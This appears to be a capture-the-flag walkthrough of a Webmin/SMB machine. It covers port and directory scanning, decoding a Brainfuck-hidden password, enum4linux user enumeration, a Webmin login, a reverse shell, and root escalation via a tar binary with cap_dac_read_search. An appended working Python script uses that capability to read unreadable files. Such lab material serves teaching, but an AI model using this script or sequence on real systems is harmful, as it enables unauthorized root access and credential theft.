1. Information gathering
Scan for open ports
Access port 80
Port 10000:
Webmin: a web-based system administration tool. Through its web pages it can configure operating system internals such as users, disk quotas, services and configuration files, and it can also modify and control open-source applications installed on the host.
Port 20000 also serves a login page.
Scan for directories.
Visit the home page and view its source.
Hidden encoded content is found. It is Brainfuck, an esoteric language whose eight symbols > < + - . , [ ] stand in for the statements and commands of a language like C.
It can be decoded here: https://www.splitbrain.org/services/ook
Note the decoded string down; it is probably a password.
2. Exploitation
The earlier scan showed ports 10000 and 20000 open.
- First try brute-forcing weak passwords; this fails.
- Port 10000 is Webmin. Public vulnerability information for Webmin exists, but it is scattered and not targeted at this version, so set it aside for now.
Then go back over the scan results and notice that another port is running SMB.
SMB is a network file-sharing protocol for communication between client and server: through SMB a client application can read and write files on the server and request services from server programs across a variety of network environments.
enum4linux is a tool for enumerating SMB services on Windows and Linux systems. It can discover:
- Domain and group membership
- User list
- Shares (drives and folders) on the target
- Password policy on the target
- Operating system of the remote target
Try logging in to Webmin with the user enumerated from SMB and the decoded Brainfuck password.
Port 20000 accepts the login.
Look through what this user is allowed to do and notice the command shell icon.
Open the shell, list files, check permissions, and spawn a reverse shell.
3. Privilege escalation
Whenever you see a copy of a binary lying around, check its file capabilities and whether it is SUID.
Query the capabilities of the tar binary in the current directory: getcap tar
Output: tar cap_dac_read_search=ep. cap_dac_read_search bypasses file read permission checks (and directory read/search checks), so this tar can read any file.
A password backup file is found, but the current user has no permission to read it.
Use this tar to archive the file and then extract the archive; the extracted copy is owned by us and can be read without any permission problem.
Read the backup password and switch to the root user.
Privilege escalation succeeds and the flag is obtained.
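As an added example of the capability check and the tar trick above (not the walkthrough's own commands), the Python below parses getcap output to confirm the effective cap_dac_read_search bit, then packs a target file with a given tar binary and streams it back out. Only the packing step needs the capability; extracting with -O to stdout sidesteps the file's original mode bits and leaves nothing on disk. The tar_bin path, the backup file name and its contents in demo() are assumed or constructed; on a real target point tar_bin at the capable copy (e.g. ./tar) and target at the unreadable backup.

```python
"""Abusing a tar binary that carries cap_dac_read_search (added example)."""
import os
import re
import shutil
import subprocess
import tempfile

# Matches both getcap output styles seen in practice:
#   "tar cap_dac_read_search=ep"            (newer libcap)
#   "/usr/bin/tar = cap_dac_read_search+ep" (older libcap)
_GETCAP_RE = re.compile(
    r"^(?P<path>\S+)\s*(?:=\s*)?(?P<caps>cap_[a-z_,]+)[=+](?P<flags>[a-z]+)$"
)


def parse_getcap(line: str) -> dict:
    """Return {'path', 'caps' (set), 'flags'} for one line of getcap output."""
    m = _GETCAP_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised getcap line: {line!r}")
    return {
        "path": m.group("path"),
        "caps": set(m.group("caps").split(",")),
        "flags": m.group("flags"),
    }


def can_read_any_file(line: str) -> bool:
    """True if the binary described by a getcap line bypasses DAC read checks.

    The capability must be in the Effective set ('e'): a stock tar is not
    capability-aware and will never raise a permitted-only capability itself,
    so 'cap_dac_read_search=p' alone would not help. cap_dac_override also
    covers reading, so it is accepted too.
    """
    info = parse_getcap(line)
    return "e" in info["flags"] and bool(
        info["caps"] & {"cap_dac_read_search", "cap_dac_override"}
    )


def read_via_tar(tar_bin: str, target: str) -> bytes:
    """Archive `target` with the (capable) tar, then stream the member to stdout."""
    with tempfile.TemporaryDirectory() as work:
        archive = os.path.join(work, "out.tar")
        # -C / plus a relative member name keeps the member path predictable
        # and avoids tar's "Removing leading /" warning.
        subprocess.run(
            [tar_bin, "-c", "-f", archive, "-C", "/", target.lstrip("/")],
            check=True, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE,
        )
        # -O writes the member to stdout: no extracted file, so a 0600 or 0000
        # mode on the original cannot get in the way.
        result = subprocess.run(
            [tar_bin, "-x", "-O", "-f", archive], check=True, capture_output=True
        )
        return result.stdout


# Constructed stand-in for the target's password backup (not real data).
SAMPLE_BACKUP = "root:not-a-real-hash:0:0:root:/root:/bin/bash\n"


def demo(tar_bin: str = "") -> str:
    """Round-trip the constructed backup through read_via_tar.

    Runs anywhere because it uses a file we already own; on the target the
    same call with tar_bin='./tar' and the real backup path is the escalation.
    """
    tar_bin = tar_bin or shutil.which("tar") or ""
    if not tar_bin:
        raise RuntimeError("no tar binary found")
    with tempfile.TemporaryDirectory() as d:
        backup = os.path.join(d, "password.bak")
        with open(backup, "w") as fh:
            fh.write(SAMPLE_BACKUP)
        return read_via_tar(tar_bin, backup).decode()


if __name__ == "__main__":
    print(can_read_any_file("tar cap_dac_read_search=ep"))
    print(demo(), end="")
```

Before relying on the trick, run `getcap ./tar` and feed the line to `can_read_any_file`; a copy whose capability sits only in the permitted set reads no better than any other tar.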